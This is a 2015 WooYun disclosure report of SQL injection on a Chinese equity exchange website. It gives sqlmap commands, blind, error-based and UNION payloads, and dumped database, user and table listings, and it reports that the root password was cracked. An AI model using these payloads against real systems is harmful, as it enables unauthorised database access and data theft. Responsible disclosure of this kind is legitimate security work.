当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144209

漏洞标题:金融安全之广州股权交易中心多处SQL注入/root权限/140个表/支持UNION

相关厂商:广州股权交易中心

漏洞作者: 路人甲

提交时间:2015-10-02 11:10

修复时间:2015-11-22 11:52

公开时间:2015-11-22 11:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-02: 细节已通知厂商并且等待厂商处理中
2015-10-08: 厂商已经确认,细节仅向厂商公开
2015-10-18: 细节向核心白帽子及相关领域专家公开
2015-10-28: 细节向普通白帽子公开
2015-11-07: 细节向实习白帽子公开
2015-11-22: 细节向公众公开

简要描述:

广州股权交易中心(http://www.china-gee.com)由广东粤财投资控股有限公司、广州金融控股集团有限公司、广州凯得控股有限公司三家大型国有企业共同出资设立,市场定位为中小企业综合金融服务平台。

详细说明:

sqlmap.py -u "http://**.**.**.**/frontpage/gqhqNotice.jsp?noticeType=lsgg&gqhqId=%27%22"


1.jpg


2.jpg


3.jpg


root权限,密码解出为root


4.jpg


5.jpg


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: gqhqId (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: noticeType=lsgg&gqhqId=-7268' OR 7766=7766#
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: noticeType=lsgg&gqhqId=-6641' OR 1 GROUP BY CONCAT(0x717a7a7071,(SELECT (CASE WHEN (7529=7529) THEN 1 ELSE 0 END)),0x716a7a7071,FLOOR(RAND(0)*2)) HAVING MIN(0)#
    Type: UNION query
    Title: MySQL UNION query (random number) - 47 columns
    Payload: noticeType=lsgg&gqhqId=-1467' UNION ALL SELECT 5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,CONCAT(0x717a7a7071,0x57417a6e7755414d6c73,0x716a7a7071),5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264#
---
web application technology: JSP
back-end DBMS: MySQL 5
current database:    'gee_web'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: gqhqId (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: noticeType=lsgg&gqhqId=-7268' OR 7766=7766#
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: noticeType=lsgg&gqhqId=-6641' OR 1 GROUP BY CONCAT(0x717a7a7071,(SELECT (CASE WHEN (7529=7529) THEN 1 ELSE 0 END)),0x716a7a7071,FLOOR(RAND(0)*2)) HAVING MIN(0)#
    Type: UNION query
    Title: MySQL UNION query (random number) - 47 columns
    Payload: noticeType=lsgg&gqhqId=-1467' UNION ALL SELECT 5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,CONCAT(0x717a7a7071,0x57417a6e7755414d6c73,0x716a7a7071),5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264#
---
web application technology: JSP
back-end DBMS: MySQL 5
available databases [5]:
[*] gee_web
[*] information_schema
[*] mysql
[*] performance_schema
[*] test


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: gqhqId (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: noticeType=lsgg&gqhqId=-7163' OR 6919=6919#
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: noticeType=lsgg&gqhqId=-9936' OR 1 GROUP BY CONCAT(0x716b7a6b71,(SELECT (CASE WHEN (5168=5168) THEN 1 ELSE 0 END)),0x7178787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#
    Type: UNION query
    Title: MySQL UNION query (random number) - 47 columns
    Payload: noticeType=lsgg&gqhqId=-9752' UNION ALL SELECT 3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,CONCAT(0x716b7a6b71,0x746647617a6e72665370,0x7178787671),3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868#
---
web application technology: JSP
back-end DBMS: MySQL 5
database management system users [1]:
[*] 'root'@'%'


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: gqhqId (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: noticeType=lsgg&gqhqId=-7163' OR 6919=6919#
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: noticeType=lsgg&gqhqId=-9936' OR 1 GROUP BY CONCAT(0x716b7a6b71,(SELECT (CASE WHEN (5168=5168) THEN 1 ELSE 0 END)),0x7178787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#
    Type: UNION query
    Title: MySQL UNION query (random number) - 47 columns
    Payload: noticeType=lsgg&gqhqId=-9752' UNION ALL SELECT 3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,CONCAT(0x716b7a6b71,0x746647617a6e72665370,0x7178787671),3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868,3868#
---
web application technology: JSP
back-end DBMS: MySQL 5
Database: gee_web
[140 tables]
+----------------------------+
| act_ge_bytearray           |
| act_ge_property            |
| act_hi_actinst             |
| act_hi_attachment          |
| act_hi_comment             |
| act_hi_detail              |
| act_hi_procinst            |
| act_hi_taskinst            |
| act_id_group               |
| act_id_info                |
| act_id_membership          |
| act_id_user                |
| act_re_deployment          |
| act_re_procdef             |
| act_ru_execution           |
| act_ru_identitylink        |
| act_ru_job                 |
| act_ru_task                |
| act_ru_variable            |
| activemq_acks              |
| activemq_lock              |
| activemq_msgs              |
| bpm_agent                  |
| bpm_approval_item          |
| bpm_def_rights             |
| bpm_def_vars               |
| bpm_definition             |
| bpm_exe_stack              |
| bpm_form_def               |
| bpm_form_dialog            |
| bpm_form_field             |
| bpm_form_rights            |
| bpm_form_rule              |
| bpm_form_run               |
| bpm_form_table             |
| bpm_form_template          |
| bpm_node_message           |
| bpm_node_rule              |
| bpm_node_script            |
| bpm_node_set               |
| bpm_node_sign              |
| bpm_node_user              |
| bpm_node_user_uplow        |
| bpm_pro_run                |
| bpm_table_template         |
| bpm_table_temprights       |
| bpm_task_comment           |
| bpm_task_due               |
| bpm_task_fork              |
| bpm_task_opinion           |
| bpm_task_reminderstate     |
| bpm_tksign_data            |
| cms_negotiation_apply      |
| cms_negotiation_members    |
| cms_negotiation_reply      |
| cms_negotiation_room       |
| cms_site_company           |
| cms_site_config            |
| cms_site_finance_direction |
| cms_site_finance_expand    |
| cms_site_finance_pledge    |
| cms_site_gqhq              |
| cms_site_gqtg              |
| cms_site_menu              |
| cms_site_menu_content      |
| cms_site_notice            |
| cms_site_qyzj              |
| cms_site_statistics        |
| cms_site_view              |
| f10                        |
| out_mail                   |
| out_mail_file              |
| out_mail_folder            |
| out_mail_linkman           |
| out_mail_user_seting       |
| qrtz_blob_triggers         |
| qrtz_calendars             |
| qrtz_cron_triggers         |
| qrtz_fired_triggers        |
| qrtz_job_details           |
| qrtz_locks                 |
| qrtz_paused_trigger_grps   |
| qrtz_scheduler_state       |
| qrtz_simple_triggers       |
| qrtz_simprop_triggers      |
| qrtz_triggers              |
| sys_accept_ip              |
| sys_audit                  |
| sys_cache_model            |
| sys_calendar               |
| sys_calendar_assign        |
| sys_calendar_setting       |
| sys_datasource             |
| sys_demension              |
| sys_dep_pos                |
| sys_desktop_column         |
| sys_desktop_layout         |
| sys_desktop_layoutcol      |
| sys_desktop_mycolumn       |
| sys_dic                    |
| sys_file                   |
| sys_gl_type                |
| sys_identity               |
| sys_joblog                 |
| sys_message                |
| sys_msg_read               |
| sys_msg_receiver           |
| sys_msg_reply              |
| sys_msg_send               |
| sys_office_template        |
| sys_org                    |
| sys_org_param              |
| sys_overtime               |
| sys_param                  |
| sys_pos_sub                |
| sys_position               |
| sys_profile                |
| sys_report_template        |
| sys_res                    |
| sys_resurl                 |
| sys_role                   |
| sys_role_menu              |
| sys_role_pos               |
| sys_role_res               |
| sys_role_sys               |
| sys_script                 |
| sys_subsystem              |
| sys_template               |
| sys_type_key               |
| sys_user                   |
| sys_user_agent             |
| sys_user_org               |
| sys_user_param             |
| sys_user_pos               |
| sys_user_role              |
| sys_vacation               |
| sys_worktime               |
| sys_worktime_setting       |
| table1                     |
| w_demo_test                |
+----------------------------+


注入二:sqlmap.py -u "http://**.**.**.**/frontpage/company.jsp?
menuPath=JQB&gqhxId=880009*"


1.jpg


注入三:sqlmap.py -u "http://**.**.**.**/frontpage/company_limi
t.jsp?menuPath=JXB&gqhxId=890173*" --current-db


1.jpg


1.jpg


还有很多处应该,应全面的排查一遍.

漏洞证明:

修复方案:

参数过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-08 11:50

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:10
正在联系相关网站管理单位处置。

最新状态:

暂无